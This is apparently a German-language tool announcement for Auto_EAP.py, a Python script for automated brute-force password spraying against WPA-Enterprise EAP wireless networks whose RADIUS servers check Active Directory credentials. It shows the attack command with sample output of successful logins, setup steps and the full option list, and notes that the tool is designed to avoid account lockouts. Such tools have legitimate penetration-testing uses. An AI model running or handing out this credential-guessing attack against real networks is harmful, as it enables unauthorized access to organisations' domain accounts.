
Automatisierte Brute-Force-Login-Angriffe gegen EAP-Netzwerke.
######Veröffentlicht am 15. September 2016
Auto_EAP.py ist ein Skript, das für automatisierte Brute-Force-Authentifizierungsangriffe gegen verschiedene Arten von EAP-Netzwerken entwickelt wurde. Diese Arten von drahtlosen Netzwerken bieten eine Schnittstelle, um Passwortraten von Domain-Anmeldeinformationen zu erleichtern, da Radius-Server die Authentifizierung gegen Active Directory prüfen. Mithilfe der Python-Bibliothek wpaspy, erstellt von [Jouni Malinen [email protected]] (https://github.com/jmalinen/hostap/tree/master/wpaspy), um mit dem wpa_supplicant-Daemon zu interagieren, können automatisierte Authentifizierungsangriffe durchgeführt werden, mit der Absicht, keine Kontosperrungen zu verursachen.
./Auto_EAP.py -s HoneyPot -K WPA-EAP -E PEAP -U test.txt -p Summer2016 -i wlan0
Initialized...
Trying Username Alice with Password test: SUCCESS
Trying Username Bob with Password test: FAILED
Trying Username Charles with Password test: FAILED
Trying Username David with Password test: SUCCESS
Completed
Führen Sie 'RunMeFirst.py' im Stammverzeichnis von Auto_EAP aus. Dadurch wird die wpaspy-Bibliothek kompiliert und eine eigenständige wpa_supplicant.conf-Datei eingerichtet, die Auto_EAP.py zum Testen verwendet, während die systemeigene wpa_supplicant-Konfigurationsdatei unberührt bleibt.
./Auto_EAP.py -h
usage: Auto_EAP.py [-h] -i Interface -s SSID -U Usernamefile -p Password -K
Key_mgmt -E Eap_type
optional arguments:
-h, --help show this help message and exit
-i Interface, --interface Interface
The Interface to use
-s SSID, --ssid SSID The SSID to attack
-U Usernamefile, --User Usernamefile
Path to username file
-p Password, --password Password
Password to use
-K Key_mgmt, --key_mgmt Key_mgmt
Key_Management type to use
-E Eap_type, --eap_type Eap_type
Eap type to use